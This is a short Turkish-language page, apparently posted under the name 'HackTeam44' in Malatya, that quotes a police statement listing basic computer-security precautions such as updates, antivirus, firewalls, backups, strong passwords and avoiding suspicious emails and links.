Emniyetten yapılan açıklamada, şu uyarılarda bulunuldu: "Bilişim dünyasında, yüzde 100 güvenlik bulunmamaktadır. En iyi korunan sistemler dahi zaman zaman bilgisayar korsanlığına maruz kalabilmektedir. Ancak temel düzeyde alınması gereken tedbirlerin bazıları aşağıda sıralanmıştır. Daha fazla bilgi için internet arama motorlarından ya da bilgi güvenliği (penetrasyon) testi yapabilen bilgisayar güvenlik firmalarından destek alabilirsiniz. Temel düzeyde alınacak tedbirler;

İşletim sistemi için üretici firmanın yayınladığı güncellemelerin yapılması.

Antivirüs programının yüklü olması (bireysel kullanımlar için bazı firmalar ücretsiz anti virüs programları sunmaktadır). Firewall / güvenlik duvarı donanım/yazılımlarının kullanılması. Önemli verilerin farklı medyalara /ortamlara periyodik olarak yedeklenmesi. Hesap şifrelerinin yüksek güvenlikli olması (büyük harf, küçük harf, sayılar ve diğer karakterlerden oluşan parola kullanımı, en az 8-10 karakter). Şüpheli e-postaların, reklam ilan sayfalarının açılmaması, şüpheli bağlantıların ziyaret edilmemesi."

Address

Malatya
44000

Website

Alerts

Be the first to know and let us send you an email when HackTeam44 posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Share